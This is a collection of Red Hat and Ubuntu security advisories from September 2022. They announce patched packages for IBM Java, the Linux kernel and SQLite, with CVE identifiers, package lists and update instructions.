Red Hat Security Advisory 2022-6755-01 - IBM Java SE version 7 Release 1 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit. This update upgrades IBM Java SE 7 to version 7R1 SR5-FP15.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: java-1.7.1-ibm security update  
Advisory ID:       RHSA-2022:6755-01  
Product:           Red Hat Enterprise Linux Supplementary  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6755  
Issue date:        2022-09-29  
CVE Names:         CVE-2021-2163   
=====================================================================

1. Summary:

An update for java-1.7.1-ibm is now available for Red Hat Enterprise Linux  
7 Supplementary.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client Supplementary (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode Supplementary (v. 7) - x86_64  
Red Hat Enterprise Linux Server Supplementary (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation Supplementary (v. 7) - x86_64

3. Description:

IBM Java SE version 7 Release 1 includes the IBM Java Runtime Environment  
and the IBM Java Software Development Kit.

This update upgrades IBM Java SE 7 to version 7R1 SR5-FP15.

Security Fix(es):

* OpenJDK: Incomplete enforcement of JAR signing disabled algorithms  
(Libraries, 8249906) (CVE-2021-2163)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of IBM Java must be restarted for this update to take  
effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

1951217 - CVE-2021-2163 OpenJDK: Incomplete enforcement of JAR signing disabled algorithms (Libraries, 8249906)

6. Package List:

Red Hat Enterprise Linux Client Supplementary (v. 7):

x86_64:  
java-1.7.1-ibm-1.7.1.5.15-1jpp.1.el7.x86_64.rpm  
java-1.7.1-ibm-demo-1.7.1.5.15-1jpp.1.el7.x86_64.rpm  
java-1.7.1-ibm-devel-1.7.1.5.15-1jpp.1.el7.x86_64.rpm  
java-1.7.1-ibm-jdbc-1.7.1.5.15-1jpp.1.el7.x86_64.rpm  
java-1.7.1-ibm-plugin-1.7.1.5.15-1jpp.1.el7.x86_64.rpm  
java-1.7.1-ibm-src-1.7.1.5.15-1jpp.1.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Supplementary (v. 7):

x86_64:  
java-1.7.1-ibm-1.7.1.5.15-1jpp.1.el7.x86_64.rpm  
java-1.7.1-ibm-demo-1.7.1.5.15-1jpp.1.el7.x86_64.rpm  
java-1.7.1-ibm-devel-1.7.1.5.15-1jpp.1.el7.x86_64.rpm  
java-1.7.1-ibm-src-1.7.1.5.15-1jpp.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Supplementary (v. 7):

ppc64:  
java-1.7.1-ibm-1.7.1.5.15-1jpp.1.el7.ppc64.rpm  
java-1.7.1-ibm-demo-1.7.1.5.15-1jpp.1.el7.ppc64.rpm  
java-1.7.1-ibm-devel-1.7.1.5.15-1jpp.1.el7.ppc64.rpm  
java-1.7.1-ibm-jdbc-1.7.1.5.15-1jpp.1.el7.ppc64.rpm  
java-1.7.1-ibm-src-1.7.1.5.15-1jpp.1.el7.ppc64.rpm

ppc64le:  
java-1.7.1-ibm-1.7.1.5.15-1jpp.1.el7.ppc64le.rpm  
java-1.7.1-ibm-demo-1.7.1.5.15-1jpp.1.el7.ppc64le.rpm  
java-1.7.1-ibm-devel-1.7.1.5.15-1jpp.1.el7.ppc64le.rpm  
java-1.7.1-ibm-jdbc-1.7.1.5.15-1jpp.1.el7.ppc64le.rpm  
java-1.7.1-ibm-src-1.7.1.5.15-1jpp.1.el7.ppc64le.rpm

s390x:  
java-1.7.1-ibm-1.7.1.5.15-1jpp.1.el7.s390x.rpm  
java-1.7.1-ibm-demo-1.7.1.5.15-1jpp.1.el7.s390x.rpm  
java-1.7.1-ibm-devel-1.7.1.5.15-1jpp.1.el7.s390x.rpm  
java-1.7.1-ibm-jdbc-1.7.1.5.15-1jpp.1.el7.s390x.rpm  
java-1.7.1-ibm-src-1.7.1.5.15-1jpp.1.el7.s390x.rpm

x86_64:  
java-1.7.1-ibm-1.7.1.5.15-1jpp.1.el7.x86_64.rpm  
java-1.7.1-ibm-demo-1.7.1.5.15-1jpp.1.el7.x86_64.rpm  
java-1.7.1-ibm-devel-1.7.1.5.15-1jpp.1.el7.x86_64.rpm  
java-1.7.1-ibm-jdbc-1.7.1.5.15-1jpp.1.el7.x86_64.rpm  
java-1.7.1-ibm-plugin-1.7.1.5.15-1jpp.1.el7.x86_64.rpm  
java-1.7.1-ibm-src-1.7.1.5.15-1jpp.1.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation Supplementary (v. 7):

x86_64:  
java-1.7.1-ibm-1.7.1.5.15-1jpp.1.el7.x86_64.rpm  
java-1.7.1-ibm-demo-1.7.1.5.15-1jpp.1.el7.x86_64.rpm  
java-1.7.1-ibm-devel-1.7.1.5.15-1jpp.1.el7.x86_64.rpm  
java-1.7.1-ibm-jdbc-1.7.1.5.15-1jpp.1.el7.x86_64.rpm  
java-1.7.1-ibm-plugin-1.7.1.5.15-1jpp.1.el7.x86_64.rpm  
java-1.7.1-ibm-src-1.7.1.5.15-1jpp.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-2163  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYzXoktzjgjWX9erEAQiErw//bfv2qMLbxalwolmuZf6CwMtjASrYej1Y  
eoK29TukbK9VlWclSIxhKkIsRJyO6QskB8tmAj+R93Kb+FvoWcGXxSXrPBFDTHjg  
Av9/gacyISbj4pvgGnfuAEq5OHIbhOG8N3VxeEMAFc+Gb+50mS7cVkrb57rGLbid  
3f8jTJrtzxekhhPc7cffJd44ef5TwtFip+u5lrEXS+JYnQpO9AeKv9GL7fvO+2eT  
+CDGrT5YVnZfNF48e8uQ1oiErNTO25ZXvdMCwBz6HhBt4mGne83Qah5Lq6xyh2vo  
EVYFUJZvqSXGKRj1uMhiP5rvfcnALNLLSDA5F95tunQ+VicN2sKM5Hz5XwnAbcYo  
dozIbWE3yvo1sVV1oTeRRuZJ/4MBkO9JQ7LwadY0ge1BQfmhfJqHztOSITKAPsYM  
HhWGz5BO0ogXPv1LE0MbifkLS6qsGdd/WWXJuDh4howpiwIm17fEB7DATA4tcZba  
EXXuBrKjtAUYEMLsP4ZwI8rU8MtbuW2O+HOiy308tJhE7dazpqyg9X3BivuO6vLe  
S2CP26SomuTJQoYu1NRp1PkLwzHLtZe7nf2W/10Z1MU/HD7mDQesgdYX5vnyusP6  
LMeHwUlel4a5x4wTM/eHBXegxskimA9ueiJAF314jSWFaEB5RcH1P5KRo5qlPzMe  
Wra6c6zvoGE=  
=WLeF  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6755-01

Red Hat Security Advisory 2022-6756-01 - IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit. This update upgrades IBM Java SE 8 to version 8 SR7-FP15.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: java-1.8.0-ibm security update  
Advisory ID:       RHSA-2022:6756-01  
Product:           Red Hat Enterprise Linux Supplementary  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6756  
Issue date:        2022-09-29  
CVE Names:         CVE-2021-2163   
=====================================================================

1. Summary:

An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux  
7 Supplementary.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client Supplementary (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode Supplementary (v. 7) - x86_64  
Red Hat Enterprise Linux Server Supplementary (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation Supplementary (v. 7) - x86_64

3. Description:

IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM  
Java Software Development Kit.

This update upgrades IBM Java SE 8 to version 8 SR7-FP15.

Security Fix(es):

* OpenJDK: Incomplete enforcement of JAR signing disabled algorithms  
(Libraries, 8249906) (CVE-2021-2163)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of IBM Java must be restarted for this update to take  
effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

1951217 - CVE-2021-2163 OpenJDK: Incomplete enforcement of JAR signing disabled algorithms (Libraries, 8249906)

6. Package List:

Red Hat Enterprise Linux Client Supplementary (v. 7):

x86_64:  
java-1.8.0-ibm-1.8.0.7.15-1jpp.1.el7.x86_64.rpm  
java-1.8.0-ibm-demo-1.8.0.7.15-1jpp.1.el7.x86_64.rpm  
java-1.8.0-ibm-devel-1.8.0.7.15-1jpp.1.el7.x86_64.rpm  
java-1.8.0-ibm-jdbc-1.8.0.7.15-1jpp.1.el7.x86_64.rpm  
java-1.8.0-ibm-plugin-1.8.0.7.15-1jpp.1.el7.x86_64.rpm  
java-1.8.0-ibm-src-1.8.0.7.15-1jpp.1.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Supplementary (v. 7):

x86_64:  
java-1.8.0-ibm-1.8.0.7.15-1jpp.1.el7.x86_64.rpm  
java-1.8.0-ibm-demo-1.8.0.7.15-1jpp.1.el7.x86_64.rpm  
java-1.8.0-ibm-devel-1.8.0.7.15-1jpp.1.el7.x86_64.rpm  
java-1.8.0-ibm-src-1.8.0.7.15-1jpp.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Supplementary (v. 7):

ppc64:  
java-1.8.0-ibm-1.8.0.7.15-1jpp.1.el7.ppc64.rpm  
java-1.8.0-ibm-demo-1.8.0.7.15-1jpp.1.el7.ppc64.rpm  
java-1.8.0-ibm-devel-1.8.0.7.15-1jpp.1.el7.ppc64.rpm  
java-1.8.0-ibm-jdbc-1.8.0.7.15-1jpp.1.el7.ppc64.rpm  
java-1.8.0-ibm-plugin-1.8.0.7.15-1jpp.1.el7.ppc64.rpm  
java-1.8.0-ibm-src-1.8.0.7.15-1jpp.1.el7.ppc64.rpm

ppc64le:  
java-1.8.0-ibm-1.8.0.7.15-1jpp.1.el7.ppc64le.rpm  
java-1.8.0-ibm-demo-1.8.0.7.15-1jpp.1.el7.ppc64le.rpm  
java-1.8.0-ibm-devel-1.8.0.7.15-1jpp.1.el7.ppc64le.rpm  
java-1.8.0-ibm-jdbc-1.8.0.7.15-1jpp.1.el7.ppc64le.rpm  
java-1.8.0-ibm-src-1.8.0.7.15-1jpp.1.el7.ppc64le.rpm

s390x:  
java-1.8.0-ibm-1.8.0.7.15-1jpp.1.el7.s390x.rpm  
java-1.8.0-ibm-demo-1.8.0.7.15-1jpp.1.el7.s390x.rpm  
java-1.8.0-ibm-devel-1.8.0.7.15-1jpp.1.el7.s390x.rpm  
java-1.8.0-ibm-jdbc-1.8.0.7.15-1jpp.1.el7.s390x.rpm  
java-1.8.0-ibm-src-1.8.0.7.15-1jpp.1.el7.s390x.rpm

x86_64:  
java-1.8.0-ibm-1.8.0.7.15-1jpp.1.el7.x86_64.rpm  
java-1.8.0-ibm-demo-1.8.0.7.15-1jpp.1.el7.x86_64.rpm  
java-1.8.0-ibm-devel-1.8.0.7.15-1jpp.1.el7.x86_64.rpm  
java-1.8.0-ibm-jdbc-1.8.0.7.15-1jpp.1.el7.x86_64.rpm  
java-1.8.0-ibm-plugin-1.8.0.7.15-1jpp.1.el7.x86_64.rpm  
java-1.8.0-ibm-src-1.8.0.7.15-1jpp.1.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation Supplementary (v. 7):

x86_64:  
java-1.8.0-ibm-1.8.0.7.15-1jpp.1.el7.x86_64.rpm  
java-1.8.0-ibm-demo-1.8.0.7.15-1jpp.1.el7.x86_64.rpm  
java-1.8.0-ibm-devel-1.8.0.7.15-1jpp.1.el7.x86_64.rpm  
java-1.8.0-ibm-jdbc-1.8.0.7.15-1jpp.1.el7.x86_64.rpm  
java-1.8.0-ibm-plugin-1.8.0.7.15-1jpp.1.el7.x86_64.rpm  
java-1.8.0-ibm-src-1.8.0.7.15-1jpp.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-2163  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYzXohdzjgjWX9erEAQjSIQ/+JPChI4owRfqyX9VBJHefA8NmSeaAUZ/v  
RBlnbwb1uXexx+o/1FmpS/k8Ek+zoSXrSyUFXzyrUf15ID2dE2zFRfeQCJPdYQBP  
KKIwVBA3xdEJYSDfa79UTrH6P+GkFLUM7guBi76oDlxCS9Bh1UTXX+b330JfphvI  
wbAMG1/19phYpsiTAkYoEIQ/bm/mFJ357wOUQ/KT/PmIYUWWyK3707I5lMfb2Upl  
3keXXpdpF0YkAbNsvNv3TXi3IDVcr6HlOtfcfFQGOXxGwiBn1Q/xovjssB7WIKRV  
BKDV2fQpJmpWOpOZ1xyqcgRKvOXJNTcfZpMJ9tVYZUOZ4XcSGIZYGnD91hlaRruu  
n4Zcs72tokXejzo/Ud/CttPUOeYzgzuBF0eH0CBpBXLDrTt1BrZjzo2HQPCF/Qw1  
Sg3odEw3mThhKHaxi7y7JVD8aQgPARc/7fLbhSItVTFHDvu74AMWEDKbgwQiQHuZ  
U6VUkTwNIsFTn6GLlGrhfKDg/UxcLd1nGlN02Cd0AesxZHCQVTtSxTXDXIuIR2j8  
aUy49//IiAiWOYCSWPHZUUjZh3csszK6mHy+D8qN8fS/1EItDJXpqauaCvwg3Rt4  
+gWKu4OlbY5UnjX31Ql5LMZGVWK0fq6CKKBFg7SvxeK6EGgHVKpppJ+0wLfMhtGJ  
AxE+e0NaLOU=  
=E3UK  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6756-01

Ubuntu Security Notice 5647-1 - It was discovered that the framebuffer driver on the Linux kernel did not verify size limits when changing font or screen size, leading to an out-of- bounds write. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Moshe Kol, Amit Klein and Yossi Gilad discovered that the IP implementation in the Linux kernel did not provide sufficient randomization when calculating port offsets. An attacker could possibly use this to expose sensitive information.

    ==========================================================================Ubuntu Security Notice USN-5647-1September 28, 2022linux-gcp vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systemsDetails:It was discovered that the framebuffer driver on the Linux kernel did notverify size limits when changing font or screen size, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2021-33655)Moshe Kol, Amit Klein and Yossi Gilad discovered that the IP implementationin the Linux kernel did not provide sufficient randomization whencalculating port offsets. An attacker could possibly use this to exposesensitive information. (CVE-2022-1012, CVE-2022-32296)Norbert Slusarek discovered that a race condition existed in the perfsubsystem in the Linux kernel, resulting in a use-after-free vulnerability.A privileged local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2022-1729)It was discovered that the device-mapper verity (dm-verity) driver in theLinux kernel did not properly verify targets being loaded into the device-mapper table. A privileged attacker could use this to cause a denial ofservice (system crash) or possibly execute arbitrary code. (CVE-2022-2503)Domingo Dirutigliano and Nicola Guerrera discovered that the netfiltersubsystem in the Linux kernel did not properly handle rules that truncatedpackets below the packet header size. When such rules are in place, aremote attacker could possibly use this to cause a denial of service(system crash). (CVE-2022-36946)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   linux-image-5.4.0-1089-gcp      5.4.0-1089.97   linux-image-gcp-lts-20.04       5.4.0.1089.94After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-5647-1   CVE-2021-33655, CVE-2022-1012, CVE-2022-1729, CVE-2022-2503,   CVE-2022-32296, CVE-2022-36946Package Information:   https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1089.97

Ubuntu Security Notice USN-5647-1

Ubuntu Security Notice 5615-2 - USN-5615-1 fixed several vulnerabilities in SQLite. This update provides the corresponding fix for CVE-2020-35525 for Ubuntu 16.04 ESM. It was discovered that SQLite incorrectly handled INTERSEC query processing. An attacker could use this issue to cause SQLite to crash, resulting in a denial of service, or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5615-2September 28, 2022sqlite3 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESMSummary:SQLite could be made to crash or execute arbitrary code.Software Description:- sqlite3: C library that implements an SQL database engineDetails:USN-5615-1 fixed several vulnerabilities in SQLite. This update providesthe corresponding fix for CVE-2020-35525 for Ubuntu 16.04 ESM.Original advisory details:  It was discovered that SQLite incorrectly handled INTERSEC query  processing. An attacker could use this issue to cause SQLite to crash,  resulting in a denial of service, or possibly execute arbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:   sqlite3                         3.11.0-1ubuntu1.5+esm1In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-5615-2   https://ubuntu.com/security/notices/USN-5615-1   CVE-2020-35525

Ubuntu Security Notice USN-5615-2

Red Hat Security Advisory 2022-6741-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include a privilege escalation vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security and bug fix update  
Advisory ID:       RHSA-2022:6741-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6741  
Issue date:        2022-09-28  
CVE Names:         CVE-2022-1729   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.7  
Advanced Update Support, Red Hat Enterprise Linux 7.7 Telco Extended Update  
Support, and Red Hat Enterprise Linux 7.7 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server AUS (v. 7.7) - noarch, x86_64  
Red Hat Enterprise Linux Server E4S (v. 7.7) - noarch, ppc64le, x86_64  
Red Hat Enterprise Linux Server Optional AUS (v. 7.7) - x86_64  
Red Hat Enterprise Linux Server Optional E4S (v. 7.7) - ppc64le, x86_64  
Red Hat Enterprise Linux Server Optional TUS (v. 7.7) - x86_64  
Red Hat Enterprise Linux Server TUS (v. 7.7) - noarch, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: race condition in perf_event_open leads to privilege escalation  
(CVE-2022-1729)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Posix ACL object is leaked in several places upon setattr and fsetxattr  
syscalls (BZ#2106586)

* netfilter: backports from upstream (BZ#2120634)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2086753 - CVE-2022-1729 kernel: race condition in perf_event_open leads to privilege escalation

6. Package List:

Red Hat Enterprise Linux Server AUS (v. 7.7):

Source:  
kernel-3.10.0-1062.70.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1062.70.1.el7.noarch.rpm  
kernel-doc-3.10.0-1062.70.1.el7.noarch.rpm

x86_64:  
bpftool-3.10.0-1062.70.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1062.70.1.el7.x86_64.rpm  
perf-3.10.0-1062.70.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
python-perf-3.10.0-1062.70.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server E4S (v. 7.7):

Source:  
kernel-3.10.0-1062.70.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1062.70.1.el7.noarch.rpm  
kernel-doc-3.10.0-1062.70.1.el7.noarch.rpm

ppc64le:  
bpftool-3.10.0-1062.70.1.el7.ppc64le.rpm  
bpftool-debuginfo-3.10.0-1062.70.1.el7.ppc64le.rpm  
kernel-3.10.0-1062.70.1.el7.ppc64le.rpm  
kernel-bootwrapper-3.10.0-1062.70.1.el7.ppc64le.rpm  
kernel-debug-3.10.0-1062.70.1.el7.ppc64le.rpm  
kernel-debug-debuginfo-3.10.0-1062.70.1.el7.ppc64le.rpm  
kernel-debuginfo-3.10.0-1062.70.1.el7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-3.10.0-1062.70.1.el7.ppc64le.rpm  
kernel-devel-3.10.0-1062.70.1.el7.ppc64le.rpm  
kernel-headers-3.10.0-1062.70.1.el7.ppc64le.rpm  
kernel-tools-3.10.0-1062.70.1.el7.ppc64le.rpm  
kernel-tools-debuginfo-3.10.0-1062.70.1.el7.ppc64le.rpm  
kernel-tools-libs-3.10.0-1062.70.1.el7.ppc64le.rpm  
perf-3.10.0-1062.70.1.el7.ppc64le.rpm  
perf-debuginfo-3.10.0-1062.70.1.el7.ppc64le.rpm  
python-perf-3.10.0-1062.70.1.el7.ppc64le.rpm  
python-perf-debuginfo-3.10.0-1062.70.1.el7.ppc64le.rpm

x86_64:  
bpftool-3.10.0-1062.70.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1062.70.1.el7.x86_64.rpm  
perf-3.10.0-1062.70.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
python-perf-3.10.0-1062.70.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server TUS (v. 7.7):

Source:  
kernel-3.10.0-1062.70.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1062.70.1.el7.noarch.rpm  
kernel-doc-3.10.0-1062.70.1.el7.noarch.rpm

x86_64:  
bpftool-3.10.0-1062.70.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1062.70.1.el7.x86_64.rpm  
perf-3.10.0-1062.70.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
python-perf-3.10.0-1062.70.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 7.7):

x86_64:  
bpftool-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1062.70.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional E4S (v. 7.7):

ppc64le:  
bpftool-debuginfo-3.10.0-1062.70.1.el7.ppc64le.rpm  
kernel-debug-debuginfo-3.10.0-1062.70.1.el7.ppc64le.rpm  
kernel-debug-devel-3.10.0-1062.70.1.el7.ppc64le.rpm  
kernel-debuginfo-3.10.0-1062.70.1.el7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-3.10.0-1062.70.1.el7.ppc64le.rpm  
kernel-tools-debuginfo-3.10.0-1062.70.1.el7.ppc64le.rpm  
kernel-tools-libs-devel-3.10.0-1062.70.1.el7.ppc64le.rpm  
perf-debuginfo-3.10.0-1062.70.1.el7.ppc64le.rpm  
python-perf-debuginfo-3.10.0-1062.70.1.el7.ppc64le.rpm

x86_64:  
bpftool-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1062.70.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional TUS (v. 7.7):

x86_64:  
bpftool-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1062.70.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.70.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1729  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

